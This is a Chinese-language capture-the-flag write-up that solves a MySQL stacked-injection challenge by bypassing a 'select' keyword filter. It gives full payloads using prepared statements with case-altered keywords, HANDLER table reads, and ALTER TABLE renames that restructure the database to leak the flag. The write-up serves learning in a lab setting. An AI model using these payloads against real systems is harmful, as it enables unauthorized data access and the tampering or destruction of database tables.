0x01
拿到题目后,发现是单引号报错字符型注入
order by 2的时候页面正常回显,order by 3的时候页面出错,所以我们知道只有两个字段。
接下来union联合查询,发现select被过滤了
所以我们需要绕过select的过滤,下面有几种方法
0x02
堆叠查询+预编译
我们发现这里可以执行多sql语句,所以我们可以采用堆叠查询,那我们查询表名,结果如下:
查询表名中的列名,结果如下:
所以我们找到flag在第一个表中,那么接下来我们要查看flag中的内容,但是这里select被过滤了,所以我们必须得绕过这个过滤,怎么绕过呢?我们可以采用预编译的方式进行绕过
-1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');prepare aaa from @sql;EXECUTE aaa;#
但是当我们执行预编译语句的时候出现下图结果:
所以这里还同时过滤了set和prepare,那我们同时也要绕过它,如何绕过,我们可以采用大小写的形式进行绕过(经尝试,双写无法绕过)
1';sEt @sql = CONCAT('sele','ct * from `1919810931114514`;');prepArE aaa from @sql;EXECUTE aaa;#
结果如图:
到这里,拿到flag
0x03
handler查询
mysql可以使用select查询表中的数据,也可使用handler语句,这条语句是一行一行的浏览一个表中的数据。
handler可以用于MyISAM和InnoDB表。
使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行
最后一行执行之后再执行handel table_name read next会返回一个空的结果。
-1';handler `1919810931114514` open;handler `1919810931114514` read first;#
上面payload是两个语句,一个是打开表,一个是读表中的第一行字段中的内容
执行结果如下:
0x04
这里看到别人分享的一个解题思路,感觉姿势挺独特,介绍一下
修改表名和列名
我们知道,这里面一共有两个表,所以我们看一下第二个表
有如下列,其中有一个列就是data列我们是可以进行查询,爆出内容的,所以我们可以利用数据库修改表名和列名的方法,将我们要查询的表名改成第二个,就可以查询出我们想要的内容了
1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#
介绍一下这几句:
alter table words rename to aaaa;先把原来的words表名字改成别的,这个随便
alter table 1919810931114514 rename to words;将表1919810931114514的名字改为words
alter table words change flag id varchar(100);将改完名字后的表中的flag改为id,字符串尽量长点吧
然后我们用1' or 1=1 --+直接就能得到正确结果
0x05
总结:
这几个方法中,感觉最快的就是handler了,这个方法我之前也是没有碰到过,通过这次做题,也是了解到这个查询语句的存在和用法。